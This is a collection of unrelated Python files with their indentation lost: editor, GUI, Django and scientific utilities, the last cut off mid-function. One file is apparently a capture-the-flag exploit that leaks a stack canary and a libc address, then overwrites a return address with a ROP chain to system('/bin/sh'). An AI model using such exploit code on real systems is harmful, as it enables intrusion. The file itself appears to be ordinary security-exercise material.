input_shape: tuple[int] or list[tuple[int]]
The input shape(s) for the layer. Shape tuples can include
None for free dimensions, instead of integer.
"""
input_shape = input_shape[0]
return (input_shape[0],) + (self._height, self._width) + (input_shape[3] * self._depth,)
|
# (emacs/sublime) -*- mode:python; coding: utf-8-unix; tab-width: 4; st-trim_trailing_white_space_on_save: true; st-ensure_newline_at_eof_on_save: true; -*-
# sublime version compatiblity layer
# * backports ST3 API to ST2
from __future__ import absolute_import, division, print_function, unicode_literals
# from __future__ import absolute_import, division, print_function
# print( "__name__ = %s" % __name__ )
# print( "__package__ = %s" % __package__ )
# import sublime
from sublime import *
import inspect
import os
from . import logging
log = logging.getLogger( __name__ )
# log.study( "__name__ = %s", __name__ )
# log.study( "__package__ = %s", __package__ )
# log.study( "cwd = %s", os.getcwd() )
# determine current Sublime Text version
# NOTE: # early versions of ST3 might return ''
# _st_version_n = int(sublime.version()) if sublime.version() else 3000
_st_version_n = int( version() ) if version() else 3000
# log.debug( "_st_version_n = %s", _st_version_n )
# initial CWD (needed for ST2 to correctly determine package information)
_package_cwd = os.getcwd()
# log.debug( "_package_cwd = %s", _package_cwd )
###
_version = version
def version ( ):
# log.debug( ".begin" )
v = _version()
if not v: v = '3000'
assert v == str( _st_version_n )
return v
def version_n ( ):
# log.debug( ".begin" )
v_n = int( version() )
assert v_n == _st_version_n
return v_n
###
def package_name ( ):
# log.debug( ".begin" )
st_vn = version_n()
if st_vn >= 3000:
name = __name__.split('.')[0]
else:
# ST2
name = os.path.basename( _package_cwd )
return name
_package_name = package_name()
###
def sublime_pathform ( path ):
# log.debug( ".begin" )
# ST (as of build 2181) requires *NIX/MSYS style paths (using '/') in several areas (eg, for the 'syntax' view setting)
return path.replace( "\\", "/" )
###
# NOTES
# dir == ST/*NIX-form relative directories
# path == OS-form absolute paths
def installed_packages_dir ( ):
# log.debug( ".begin" )
return 'Installed Packages'
_installed_packages_path = installed_packages_path
def installed_packages_path ( ):
# log.debug( ".begin" )
return _installed_packages_path()
def installed_package_path ( package_name=_package_name ):
return os.path.join( installed_packages_path(), package_name+'.sublime-package' )
def packages_dir ( ):
# log.debug( ".begin" )
return 'Packages'
_packages_path = packages_path
def packages_path ( ):
# log.debug( ".begin" )
return _packages_path()
def package_dir ( package_name=_package_name ):
# log.debug( ".begin" )
return sublime_pathform( os.path.join( packages_dir(), package_name ) )
def package_path ( package_name=_package_name ):
# log.debug( ".begin" )
return os.path.join( packages_path(), package_name )
###
try: _find_resources = find_resources
except NameError:
_find_resources = None
def find_resources ( fnmatch_pattern ):
# log.debug( ".begin" )
import fnmatch
import os
# if hasattr(sublime, 'find_resources'):
if _find_resources is not None:
for f in _find_resources( fnmatch_pattern ):
yield f
else:
# ST2
for root, dirs, files in os.walk( _packages_path() ):
for f in files:
if fnmatch.fnmatch( f, fnmatch_pattern ):
langfile = os.path.relpath( os.path.join(root, f), _packages_path() )
yield sublime_pathform( os.path.join( packages_dir(), langfile ) )
###
_DEFAULT_MAX_CACHE_TIME = 600 # 600 sec == 10 min
_resource_cache = []
_resource_cache_timestamp = 0
def _get_resources ( max_cache_time=_DEFAULT_MAX_CACHE_TIME ):
# log.debug( ".begin" )
import time
now = time.time()
global _resource_cache
global _resource_cache_timestamp
if (( now - _resource_cache_timestamp ) > max_cache_time ):
# info( "cache expired; re-reading all resources" )
_resource_cache = list ( find_resources( '*' ) )
_resource_cache_timestamp = now
# log.notice( "len(_resource_cache) = %d", len(_resource_cache) )
return _resource_cache
def find_package_resources ( fnmatch_pattern, package_name=_package_name, max_cache_time=_DEFAULT_MAX_CACHE_TIME ):
# log.debug( ".begin" )
import fnmatch, os
files = _get_resources( max_cache_time )
prefix = sublime_pathform( os.path.join( packages_dir(), package_name ) )
# log.info( "prefix = '%s'", prefix )
for f in files:
if f.startswith( prefix ):
if fnmatch.fnmatch( f, fnmatch_pattern ):
yield f
def find_resources_regex ( regex_pattern, max_cache_time=_DEFAULT_MAX_CACHE_TIME ):
# log.debug( ".begin" )
import re
files = _get_resources( max_cache_time )
regex = re.compile( regex_pattern )
for f in files:
if regex.match(f):
yield f
###
try: _load_resource = load_resource
except NameError:
_load_resource = None
def load_resource ( path ):
# log.debug( ".begin" )
if _load_resource is not None:
return _load_resource( path )
else:
# ST2
resource_path = os.path.join( os.path.dirname( _installed_packages_path() ), path )
with open( resource_path ) as file:
resource = file.read()
return resource
try: _load_binary_resource = load_binary_resource
except NameError:
_load_resource = None
def load_binary_resource ( path ):
# log.debug( ".begin" )
if _load_binary_resource is not None:
return _load_binary_resource( path )
else:
# ST2
resource_path = os.path.join( os.path.dirname( _installed_packages_path() ), path )
with open( resource_path, mode='rb' ) as file:
resource = file.read()
return resource
def resource_abstract_path ( path ):
# path of file or .sublime-package which holds the resource content
# log.debug( ".begin" )
pass
def is_resource_accessible ( path ):
# log.debug( ".begin" )
pass
###
def load_base_settings ( ):
st_vn = version_n()
if st_vn >= 2174:
settings_base = load_settings('Preferences.sublime-settings')
else:
settings_base = load_settings('Base File.sublime-settings')
return settings_base
|
from ptrlib import *
import math
def search(x):
if x <= 255 * 255:
lx = ly = 1
for x1 in range(1, 0x100):
for x2 in range(1, 0x100):
if abs(x - x1 * x2) < abs(x - lx * ly):
lx, ly = x1, x2
return {lx: 1, ly: 1}
l = search(math.sqrt(x))
for key in l:
l[key] *= 2
return l
def product(l):
y = 1
for w in l:
y *= w ** l[w]
return y
libc = ELF("./libc-2.27.so")
sock = Process("./multiplier")
sock.recvline()
# leak canary
sock.recvline()
for i in range(25):
sock.sendline("255")
sock.sendline("0")
canary = bytes.fromhex(bytes2str(sock.recvline().rstrip()[:-0x18 * 2]))
canary = u64(b'\x00' + canary[::-1][1:])
dump("canary = " + hex(canary))
# leak libc base
sock.recvline()
for i in range(41):
sock.sendline("255")
sock.sendline("0")
addr_retaddr = bytes.fromhex(bytes2str(sock.recvline().rstrip()[:-0x28 * 2]))
addr_retaddr = u64(addr_retaddr[::-1])
libc_base = (addr_retaddr - libc.symbol("__libc_start_main")) & 0xfffffffffffff000
dump("libc base = " + hex(libc_base))
# overwrite return address
rop_pop_rdi = 0x0002155f
payload = 0
payload = (payload | (libc_base + libc.symbol("system"))) << 64
payload = (payload | (libc_base + next(libc.find("/bin/sh")))) << 64
payload = (payload | (libc_base + rop_pop_rdi)) << 64
payload = (payload | canary) << (64 + 0x10 * 8)
print(hex(payload))
while payload > 0:
l = search(payload)
y = product(l)
print("-----")
print(hex(payload))
print(hex(y))
mask = 0
for i in range(len(hex(payload)[2:]) // 2 - 1):
mask <<= 8
mask |= 0xff
payload &= mask
|
# -*- coding: utf-8 -*-
import wx
import rmodel
import h5py
import rttov
import util
from rview import layeritem
import locale
import numpy
import matplotlib
import sys
import copy
import logging
from profileframeutils import GenericPlotItemPanel, MyNotebook
from profileframeutils import kindOfItem, PlotItemPanelAll
locale.setlocale(locale.LC_ALL, '')
class PlotItemPanel(GenericPlotItemPanel):
""" plot on a PlotPanel one curve """
def __init__(self, parent, value, pression, theName, liste_item=None,
kind="GASES", xlegend="(mw/cm-1/ster/sq.m)/ppmv",
layerstyle=False, layer=None, yInPressions=True, tskin=None):
edit = False
GenericPlotItemPanel.__init__(self, parent, value, pression, theName,
liste_item, kind, xlegend,
edit, layerstyle, layer, yInPressions,
tskin)
self.SetTickSize(8)
class KProfileView (util.GenericViewRadio):
""" Profile window of the application """
helpTitle = "Help Profile"
helpMessage = """
Select and visualize a component profile on the right panel
Click left button to modify the profile.
Click left and drag a zone to zoom in.
Click right button to zoom out.
Apply your changes or save the profile
for the next run of RTTOV.
"""
def __init__(self, parent, profile, channel=1, baseProfile=None,
edit=False, yInPressions=True, runNumber=1):
self.edit = edit
logging.debug("profile" + str(profile['T'].shape))
logging.debug("baseProfile" + str(baseProfile['T'].shape))
self.myProfile = copy.deepcopy(profile)
self.yInPressions = yInPressions
if baseProfile is not None:
self.myProfile['P'] = baseProfile['P']
self._ComputeLayers(self.myProfile['P'])
else:
self.yInPressions = False
self.my_list_cloud = []
for layeritem in self.myProfile.cloud_list:
self.my_list_cloud.append(layeritem)
self.my_list_cloud.append("CFRAC")
self.my_list_cloud.append("CLW")
util.GenericView.__init__(self, parent, "PROFILE")
sizer = wx.BoxSizer(wx.HORIZONTAL)
self.SetSizer(sizer)
self.CreateMenuBar()
if baseProfile is not None:
self.items["ypressions"].Enable(True)
self.items["ypressions"].Check(True)
self.items["ylevels"].Check(False)
else:
self.items["ypressions"].Enable(False)
self.items["ypressions"].Check(False)
self.items["ylevels"].Check(True)
self.SetSize((1450, 700))
self.SetMinSize((1300, 700))
self.SetTitle("run %d k profile channel %d" % (runNumber, channel))
# panel 1 notebook with all curves (GASES, AEROSOLS, CLOUDS)
self.panel1 = wx.Panel(self, -1, style=wx.BORDER_SIMPLE)
self.panel1.SetSize((200, 500))
sizer.Add(self.panel1, 1, wx.EXPAND)
# creation of notebook for the panel 1
self.nb_all = MyNotebook(self.panel1, isRightPage=False)
sizer1 = wx.BoxSizer()
sizer1.Add(self.nb_all, 1, wx.EXPAND)
self.panel1.SetSizer(sizer1)
# panel 2 notebook with one curve
self.panel2 = wx.Panel(self, -1, style=wx.BORDER_SIMPLE)
sizer.Add(self.panel2, 1, wx.EXPAND)
# creation of the notebook for the panel 2
self.nb = MyNotebook(self.panel2)
self.axesDef = []
# creation des graphiques
self.Plot(self.myProfile)
# create a second sizer for the notebook
sizer2 = wx.BoxSizer()
sizer2.Add(self.nb, 1, wx.EXPAND)
self.panel2.SetSizer(sizer2)
self.sb = self.CreateStatusBar()
self.sb.SetBackgroundColour('WHITE')
txt = ''
self.sb.SetStatusText(txt)
self.Centre()
self.Show(True)
def PlotLeft(self, profile=None):
# plot panel 1 with all gas
self.allGraphicsPages = {}
self.allGraphicsPages['GASES'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
kind='GASES',
xlegendT=self.myProfile[
'T_ATTRIBUTE']['UNITS'],
yInPressions=self.yInPressions,
addTskin=True)
self.allGraphicsPages['GASES'].SetTickSize(8)
self.nb_all.AddPage(self.allGraphicsPages['GASES'], 'GASES')
if self.myProfile.anyAerosol():
self.allGraphicsPages['AEROSOLS'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
kind="AEROSOLS",
layer=self.layer,
xlegendT=self.myProfile[
'T_ATTRIBUTE']['UNITS'],
yInPressions=(
self.yInPressions))
self.allGraphicsPages['AEROSOLS'].SetTickSize(8)
self.nb_all.AddPage(self.allGraphicsPages['AEROSOLS'], 'AEROSOLS')
if self.myProfile.anyCloud():
self.allGraphicsPages['CLOUDS'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
xlegendT=self.myProfile[
'T_ATTRIBUTE']['UNITS'],
kind="CLOUDS",
layer=self.layer,
yInPressions=self.yInPressions)
self.allGraphicsPages['CLOUDS'].SetTickSize(8)
self.nb_all.AddPage(self.allGraphicsPages['CLOUDS'], 'CLOUDS')
def Plot(self, profile=None):
if profile is not None:
self.myProfile = profile
self._ComputeLayers(self.myProfile['P'])
self.graphicPages = {}
self.graphicPages['T'] = PlotItemPanel(self.nb,
self.myProfile['T'],
self.myProfile['P'],
theName='T',
xlegend=self.myProfile[
'T_ATTRIBUTE']['UNITS'],
yInPressions=self.yInPressions,
tskin=self.myProfile[
'SKIN']['T'])
self.nb.AddPage(self.graphicPages['T'], 'T')
for gas in self.myProfile.gas_list:
if self.myProfile[gas] is not None:
self.graphicPages[gas] = PlotItemPanel(self.nb,
self.myProfile[gas],
self.myProfile['P'],
theName=gas,
xlegend=self.myProfile[
gas + '_ATTRIBUTE'][
'UNITS'],
yInPressions=(
self.yInPressions))
self.nb.AddPage(self.graphicPages[gas], gas)
if self.myProfile.anyAerosol():
for aerosol in self.myProfile.aerosol_list:
if self.myProfile[aerosol] is not None:
self.graphicPages[aerosol] = PlotItemPanel(
self.nb,
self.myProfile[aerosol],
self.myProfile['P'],
theName=aerosol,
kind="AEROSOLS",
xlegend=self.myProfile[
aerosol + '_ATTRIBUTE'][
'UNITS'],
layer=self.layer,
yInPressions=(
self.yInPressions),
layerstyle=True)
self.nb.AddPage(self.graphicPages[aerosol], aerosol)
if self.myProfile.anyCloud():
for cloud in self.my_list_cloud:
if self.myProfile[cloud] is not None:
if cloud == "CFRAC":
mylegend = "CFRAC"
else:
mylegend = "layer mean content (g/m3)"
self.graphicPages[cloud] = PlotItemPanel(
self.nb,
self.myProfile[cloud],
self.myProfile['P'],
theName=cloud,
kind="CLOUDS",
xlegend=mylegend,
layer=self.layer,
yInPressions=(
self.yInPressions),
layerstyle=True)
self.nb.AddPage(self.graphicPages[cloud], cloud)
# delete empty graphicPages
for key in self.graphicPages.keys():
if self.myProfile[key] is None:
del self.graphicPages[key]
# plot panel 1 with all gas
self.PlotLeft()
def _ComputeLayers(self, pression):
""" Compute the mean value of pression in a layer """
foo = numpy.empty(pression.shape[0] - 1)
for i in range(foo.shape[0]):
foo[i] = (pression[i + 1] + pression[i]) / 2
self.layer = foo
def _MakeBinding(self):
""" set the trivial Binding for the View """
# binding cancel button
def RePlotAll(self, profile=None):
""" Plot the 2 panels with (new) profile
(delete everything before redraw) """
if profile is not None:
self.myProfile = profile
self._ComputeLayers(self.myProfile['P'])
# remove all pages of the notebook
self.nb.DeleteAllPages()
self.nb_all.DeleteAllPages()
self.Plot()
def RePlotAllLeftPanel(self, profile=None):
""" Plot the 2 panels with (new) profile
(delete everything before redraw) """
if profile is not None:
self.myProfile = profile
self._ComputeLayers(self.myProfile['P'])
# remove all pages of the notebook
self.nb_all.DeleteAllPages()
self.PlotLeft()
def addRightPage(self, item):
""" add an new item page """
kind = kindOfItem[item]
if kind == "GASES":
myY = self.myProfile['P']
else:
myY = self.layer
self.graphicPages[item] = PlotItemPanel(self.nb, self.myProfile[item],
self.myProfile['P'],
theName=item, kind=kind,
xlegend=self.myProfile[
item + '_ATTRIBUTE'][
'UNITS'],
layer=myY,
yInPressions=self.yInPression)
self.nb.AddPage(self.graphicPages[item], item)
if kind == "CLOUDS":
if 'CFRAC' not in self.graphicPages:
item = 'CFRAC'
self.graphicPages[item] = PlotItemPanel(
self.nb, self.myProfile[item],
self.myProfile['P'], theName=item,
kind=kind, xlegend="CFRAC",
layer=myY,
yInPressions=self.yInPression)
self.nb.AddPage(self.graphicPages[item], item)
if 'CLW' not in self.graphicPages and self.myProfile[
'CLW'] is not None:
item = "CLW"
self.graphicPages[item] = PlotItemPanel(
self.nb, self.myProfile[item],
self.myProfile['P'], theName=item,
kind=kind, xlegend="CLW",
layer=myY,
yInPressions=self.yInPression)
self.nb.AddPage(self.graphicPages[item], item)
def OnClose(self, e):
""" close the surface windows"""
self.Close()
def OnMouseMove(self, e):
""" print x y value of the left plot in the status bar """
pass
def OnYPressions(self, e):
self.yInPressions = True
self.RePlotAll()
def OnYLevels(self, e):
self.yInPressions = False
self.RePlotAll()
def MenuData(self):
""" define the data for the menu
"""
return(("&File", # File Menu
('&Quit', 'Quit', self.OnQuit, "quit", True, False)),
("&Edit", # Edit Menu
("Yaxis in pressure units", "put y in pressure units",
self.OnYPressions, "ypressions", False, True),
("Yaxis in level units", "put y in level unit",
self.OnYLevels, "ylevels", True, True)),
("&Help", # Help Menu
("About", "About screen", self.OnAbout, "about", True, False)))
if __name__ == "__main__":
print "version matplotlib :", matplotlib.__version__
p = rmodel.project.Project()
ex = wx.App()
fh5 = sys.argv[1]
print "f=", fh5
kmat = rttov.kmatrix.Kmatrix()
frad = h5py.File(fh5, 'r')
h5 = frad['/']
kmat.loadh5(h5)
baseProfile = rttov.profile.Profile()
frad.close()
baseProfile = rmodel.project.OpenAProfile(fh5, 1)
profile = kmat.getchanprof(1)
print "tskin", profile['SKIN']['T']
profile.display()
print "T shape", profile['T'].shape
print " NLEVELS : ", profile['NLEVELS']
print profile['NLEVELS']
print "P"
print baseProfile["P"]
print "T"
print profile['T']
print max(profile['T'])
frame = KProfileView(None, profile, channel=1,
yInPressions=True, baseProfile=baseProfile)
frame.Show()
ex.MainLoop()
print "loop"
ex.MainLoop()
# ex.MainLoop()
|
from collections import OrderedDict
from allauth.account.models import EmailAddress, EmailConfirmation
from django.urls import reverse
from rest_framework.validators import UniqueValidator, UniqueTogetherValidator
from rest_framework import serializers
from .serializers import BaseSerializer
__all__ = [
'EmailSerializer',
'EmailVerificationSerializer'
]
class IsVerified(object):
def __call__(self, value):
if self.instance and self.instance.verified:
# This is an Update to a verified address
if self.instance.email != self.data.get('email'):
message = 'Verified email addresses cannot be modified'
raise serializers.ValidationError(message)
def set_context(self, serializer_field):
self.instance = getattr(serializer_field.parent, 'instance', None)
self.data = getattr(serializer_field.parent, 'initial_data', None)
class EmailSerializer(BaseSerializer):
id = serializers.IntegerField(read_only=True)
email = serializers.EmailField(
required=True,
validators=[
UniqueValidator(queryset=EmailAddress.objects.all()),
IsVerified()
]
)
verified = serializers.BooleanField(read_only=True)
primary = serializers.BooleanField(default=False)
class Meta:
model = EmailAddress
fields = (
'url',
'related',
'summary_fields',
'id',
'email',
'verified',
'primary',
'user'
)
validators = [
UniqueTogetherValidator(
queryset=EmailAddress.objects.all(),
fields=('email', 'user', 'primary'),
message="Only one email address can be primary"),
]
def get_url(self, obj):
if obj is None:
return ''
return reverse('api:email_detail', args=(obj.pk,))
def get_related(self, obj):
d = super().get_related(obj)
d['user'] = reverse('api:user_detail', args=(obj.user.pk,))
return d
def get_summary_fields(self, obj):
if obj is None:
return {}
d = super().get_summary_fields(obj)
d['user'] = OrderedDict([
('id', obj.user.id),
('username', obj.user.username)
])
return d
class EmailVerificationSerializer(BaseSerializer):
verified = serializers.SerializerMethodField()
class Meta:
model = EmailConfirmation
fields = (
'email_address',
'verified'
)
def get_verified(self, instance):
return instance.email_address.verified
|
import ac, acsys
import traceback
from math import sin, cos, pi
from colourfader import ColourFader
from moving_average_plotter import MovingAveragePlotter
class TractionCircleView:
FINAL_COLOUR_DATA_POINTS = (0.25, 0.50, 0.10, 1.00)
START_COLOUR_DATA_POINTS = (0.00, 0.75, 0.00, 0.00)
FINAL_COLOUR_MOVING_AVERAGE = (1.00, 1.00, 1.00, 1.00)
START_COLOUR_MOVING_AVERAGE = (0.75, 0.75, 0.75, 0.25)
def __init__(self, window, tractionCircleModel, gPlotter, movingAvgPlotter):
self.scatterSize = 0.04
self.currentSize = 0.10
self.gPlotter = gPlotter
self.tractionCircleModel = tractionCircleModel
self.dataPointsColourFader = ColourFader(self.START_COLOUR_DATA_POINTS, self.FINAL_COLOUR_DATA_POINTS)
self.movingAverageColourFader = ColourFader(self.START_COLOUR_MOVING_AVERAGE, self.FINAL_COLOUR_MOVING_AVERAGE)
self.movingAvgPlotter = movingAvgPlotter
def drawCross(self, radius):
ac.glBegin(1)
ac.glVertex2f(*self.gPlotter.plotG(-radius, 0))
ac.glVertex2f(*self.gPlotter.plotG(+radius, 0))
ac.glEnd()
ac.glBegin(1)
ac.glVertex2f(*self.gPlotter.plotG(0, -radius))
ac.glVertex2f(*self.gPlotter.plotG(0, +radius))
ac.glEnd()
def drawCircumference(self, radius, center):
ac.glBegin(1)
nlines = 24
for i in range(nlines+1):
x, y = self.gPlotter.plotG(center['x'] + (sin(2*pi*i/nlines)*radius), center['z'] + (cos(2*pi*i/nlines)*radius))
ac.glVertex2f(x, y)
ac.glEnd()
def drawCircle(self, radius, center):
ac.glBegin(acsys.GL.Triangles)
prevx, prevy = self.gPlotter.plotG(center['x'], center['z'])
ntriangles = max(4, int(100.*radius))
for i in range(ntriangles+1):
ac.glVertex2f(*self.gPlotter.plotG(center['x'], center['z']))
ac.glVertex2f(prevx, prevy)
x, y = self.gPlotter.plotG(center['x'] + (sin(2*pi*i/ntriangles)*radius), center['z'] + (cos(2*pi*i/ntriangles)*radius))
ac.glVertex2f(x, y)
prevx, prevy = x, y
ac.glEnd()
def drawGrid(self, radius):
ac.glColor4f(0.8, 0.8, 0.8, 0.7)
self.drawCross(radius)
ac.glColor4f(1.0, 1.0, 1.0, 0.9)
self.drawCircumference(radius, {'x':0, 'z':0})
self.drawCircumference(radius/2, {'x':0, 'z':0})
def drawScatterPlot(self, colourFades, dataPoints):
for dataPoint, colour in zip(dataPoints, colourFades):
ac.glColor4f(*colour)
self.drawCircle(self.scatterSize, dataPoint)
ac.glColor3f(1.0, 1.0, 1.0)
def drawLinePlot(self, colourFades, dataPoints):
ac.glBegin(1)
for dataPoint, colour in zip(dataPoints, colourFades):
ac.glColor4f(*colour)
x, y = self.gPlotter.plotG(dataPoint['x'], dataPoint['z'])
ac.glVertex2f(x,y)
ac.glEnd()
def drawPoint(self, radius, dataPoint):
ac.glColor3f(0.2, 1.0, 0.2)
self.drawCircle(radius, dataPoint)
ac.glColor3f(1.0, 1.0, 1.0)
self.drawCircumference(radius, dataPoint)
def render(self):
try:
dataPoints = self.tractionCircleModel.dataPoints()
moving_average = self.movingAvgPlotter.plotMovingAverage(dataPoints)
dataPointsColourFades = self.dataPointsColourFader.fade(len(dataPoints))
movingAverageColourFades = self.movingAverageColourFader.fade(len(dataPoints))
self.drawGrid(self.gPlotter.maxXRange)
self.drawScatterPlot(dataPointsColourFades, dataPoints)
self.drawLinePlot(movingAverageColourFades, moving_average)
if len(moving_average) > 0:
self.drawPoint(self.currentSize, moving_average[-1])
except Exception as e:
ac.log(str(traceback.format_exc()))
|
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
import warnings
import xarray as xr
import pysat
def set_data_dir(path=None, store=True):
"""
Set the top level directory pysat uses to look for data and reload.
Parameters
----------
path : string
valid path to directory pysat uses to look for data
store : bool
if True, store data directory for future runs
"""
import os
import sys
import pysat
if sys.version_info[0] >= 3:
from importlib import reload as re_load
else:
re_load = reload
# account for a user prefix in the path, such as ~
path = os.path.expanduser(path)
# account for the presence of $HOME or similar
path = os.path.expandvars(path)
if os.path.isdir(path):
if store:
with open(os.path.join(os.path.expanduser('~'), '.pysat',
'data_path.txt'), 'w') as f:
f.write(path)
pysat.data_dir = path
pysat._files = re_load(pysat._files)
pysat._instrument = re_load(pysat._instrument)
else:
raise ValueError('Path %s does not lead to a valid directory.' % path)
def computational_form(data):
"""Deprecated function. Moved to pysat.ssnl.computational_form"""
import warnings
warnings.warn(' '.join(["utils.computational_form is deprecated, use",
"pysat.ssnl.computational_form instead"]),
DeprecationWarning, stacklevel=2)
dslice = pysat.ssnl.computational_form(data)
return dslice
def scale_units(out_unit, in_unit):
""" Determine the scaling factor between two units
Parameters
-------------
out_unit : str
Desired unit after scaling
in_unit : str
Unit to be scaled
Returns
-----------
unit_scale : float
Scaling factor that will convert from in_units to out_units
Notes
-------
Accepted units include degrees ('deg', 'degree', 'degrees'),
radians ('rad', 'radian', 'radians'),
hours ('h', 'hr', 'hrs', 'hour', 'hours'), and lengths ('m', 'km', 'cm').
Can convert between degrees, radians, and hours or different lengths.
Example
-----------
::
import numpy as np
two_pi = 2.0 * np.pi
scale = scale_units("deg", "RAD")
two_pi *= scale
two_pi # will show 360.0
"""
if out_unit == in_unit:
return 1.0
accepted_units = {'deg': ['deg', 'degree', 'degrees'],
'rad': ['rad', 'radian', 'radians'],
'h': ['h', 'hr', 'hrs', 'hours'],
'm': ['m', 'km', 'cm'],
'm/s': ['m/s', 'cm/s', 'km/s', 'm s$^{-1}$',
'cm s$^{-1}$', 'km s$^{-1}$', 'm s-1', 'cm s-1',
'km s-1']}
replace_str = {'/s': [' s$^{-1}$', ' s-1']}
scales = {'deg': 180.0, 'rad': np.pi, 'h': 12.0,
'm': 1.0, 'km': 0.001, 'cm': 100.0,
'm/s': 1.0, 'cm/s': 100.0, 'km/s': 0.001}
# Test input and determine transformation type
out_key = out_unit.lower()
in_key = in_unit.lower()
for kk in accepted_units.keys():
if out_key in accepted_units.keys() and in_key in accepted_units.keys():
break
if(out_key not in accepted_units.keys() and
out_unit.lower() in accepted_units[kk]):
out_key = kk
if(in_key not in accepted_units.keys() and
in_unit.lower() in accepted_units[kk]):
in_key = kk
if(out_key not in accepted_units.keys() and
in_key not in accepted_units.keys()):
raise ValueError(''.join(['Cannot scale {:s} and '.format(in_unit),
'{:s}, unknown units'.format(out_unit)]))
if out_key not in accepted_units.keys():
raise ValueError('Unknown output unit {:}'.format(out_unit))
if in_key not in accepted_units.keys():
raise ValueError('Unknown input unit {:}'.format(in_unit))
if out_key == 'm' or out_key == 'm/s' or in_key == 'm' or in_key == 'm/s':
if in_key != out_key:
raise ValueError('Cannot scale {:s} and {:s}'.format(out_unit,
in_unit))
# Recast units as keys for the scales dictionary and ensure that
# the format is consistent
rkey = ''
for rr in replace_str.keys():
if out_key.find(rr):
rkey = rr
out_key = out_unit.lower()
in_key = in_unit.lower()
if rkey in replace_str.keys():
for rval in replace_str[rkey]:
out_key = out_key.replace(rval, rkey)
in_key = in_key.replace(rval, rkey)
unit_scale = scales[out_key] / scales[in_key]
return unit_scale
def load_netcdf4(fnames=None, strict_meta=False, file_format=None,
epoch_name='Epoch', units_label='units',
name_label='long_name', notes_label='notes',
desc_label='desc', plot_label='label', axis_label='axis',
scale_label='scale', min_label='value_min',
max_label='value_max', fill_label='fill',
pandas_format=True):
# unix_time=False, **kwargs):
"""Load netCDF-3/4 file produced by pysat.
Parameters
----------
fnames : string or array_like of strings (None)
filenames to load
strict_meta : boolean (False)
check if metadata across fnames is the same
file_format : string (None)
file_format keyword passed to netCDF4 routine
NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4
epoch_name : string ('Epoch')
units_label : string ('units')
keyword for unit information
name_label : string ('long_name')
keyword for informative name label
notes_label : string ('notes')
keyword for file notes
desc_label : string ('desc')
keyword for data descriptions
plot_label : string ('label')
keyword for name to use on plot labels
axis_label : string ('axis')
keyword for axis labels
scale_label : string ('scale')
keyword for plot scaling
min_label : string ('value_min')
keyword for minimum in allowable value range
max_label : string ('value_max')
keyword for maximum in allowable value range
fill_label : string ('fill')
keyword for fill values
Returns
--------
out : pandas.core.frame.DataFrame
DataFrame output
mdata : pysat._meta.Meta
Meta data
"""
import copy
import netCDF4
import pandas as pds
import pysat
try:
basestring
except NameError:
basestring = str
if fnames is None:
raise ValueError("Must supply a filename/list of filenames")
if isinstance(fnames, basestring):
fnames = [fnames]
if file_format is None:
file_format = 'NETCDF4'
else:
file_format = file_format.upper()
saved_mdata = None
running_idx = 0
running_store = []
two_d_keys = []
two_d_dims = []
three_d_keys = []
three_d_dims = []
mdata = pysat.Meta(units_label=units_label,
name_label=name_label,
notes_label=notes_label,
desc_label=desc_label,
plot_label=plot_label,
axis_label=axis_label,
scale_label=scale_label,
min_label=min_label,
max_label=max_label,
fill_label=fill_label)
if pandas_format:
for fname in fnames:
with netCDF4.Dataset(fname, mode='r', format=file_format) as data:
# build up dictionary with all global ncattrs
# and add those attributes to a pysat meta object
ncattrsList = data.ncattrs()
for d in ncattrsList:
if hasattr(mdata, d):
mdata.__setattr__(d+'_', data.getncattr(d))
else:
mdata.__setattr__(d, data.getncattr(d))
loadedVars = {}
for key in data.variables.keys():
# load up metadata. From here group unique
# dimensions and act accordingly, 1D, 2D, 3D
if len(data.variables[key].dimensions) == 1:
if pandas_format:
# load 1D data variable
# assuming basic time dimension
loadedVars[key] = data.variables[key][:]
# load up metadata
meta_dict = {}
for nc_key in data.variables[key].ncattrs():
meta_dict[nc_key] = \
data.variables[key].getncattr(nc_key)
mdata[key] = meta_dict
if len(data.variables[key].dimensions) == 2:
# part of dataframe within dataframe
two_d_keys.append(key)
two_d_dims.append(data.variables[key].dimensions)
if len(data.variables[key].dimensions) == 3:
warnings.warn(' '.join(["Support for 3D data in pandas",
"will be removed in pysat 3.0",
"Please use xarray for",
"multi-dimension data."]),
DeprecationWarning, stacklevel=2)
# part of full/dedicated dataframe within dataframe
three_d_keys.append(key)
three_d_dims.append(data.variables[key].dimensions)
# we now have a list of keys that need to go into a dataframe,
# could be more than one, collect unique dimensions for 2D keys
for dim in set(two_d_dims):
# first or second dimension could be epoch
# Use other dimension name as variable name
if dim[0] == epoch_name:
obj_key_name = dim[1]
elif dim[1] == epoch_name:
obj_key_name = dim[0]
else:
raise KeyError('Epoch not found!')
# collect variable names associated with dimension
idx_bool = [dim == i for i in two_d_dims]
idx, = np.where(np.array(idx_bool))
obj_var_keys = []
clean_var_keys = []
for i in idx:
obj_var_keys.append(two_d_keys[i])
clean_var_keys.append(
two_d_keys[i].split(obj_key_name + '_')[-1])
# figure out how to index this data, it could provide its
# own index - or we may have to create simple integer based
# DataFrame access. If the dimension is stored as its own
# variable then use that info for index
if obj_key_name in obj_var_keys:
# string used to indentify dimension also in
# data.variables will be used as an index
index_key_name = obj_key_name
# if the object index uses UNIX time, process into
# datetime index
if data.variables[obj_key_name].getncattr(name_label) == \
epoch_name:
# name to be used in DataFrame index
index_name = epoch_name
time_index_flag = True
else:
time_index_flag = False
# label to be used in DataFrame index
index_name = \
data.variables[obj_key_name].getncattr(name_label)
else:
# dimension is not itself a variable
index_key_name = None
# iterate over the variables and grab metadata
dim_meta_data = pysat.Meta(units_label=units_label,
name_label=name_label,
notes_label=notes_label,
desc_label=desc_label,
plot_label=plot_label,
axis_label=axis_label,
scale_label=scale_label,
min_label=min_label,
max_label=max_label,
fill_label=fill_label)
for key, clean_key in zip(obj_var_keys, clean_var_keys):
# store attributes in metadata, exept for dim name
meta_dict = {}
for nc_key in data.variables[key].ncattrs():
meta_dict[nc_key] = \
data.variables[key].getncattr(nc_key)
dim_meta_data[clean_key] = meta_dict
dim_meta_dict = {'meta': dim_meta_data}
if index_key_name is not None:
# add top level meta
for nc_key in data.variables[obj_key_name].ncattrs():
dim_meta_dict[nc_key] = \
data.variables[obj_key_name].getncattr(nc_key)
mdata[obj_key_name] = dim_meta_dict
# iterate over all variables with this dimension
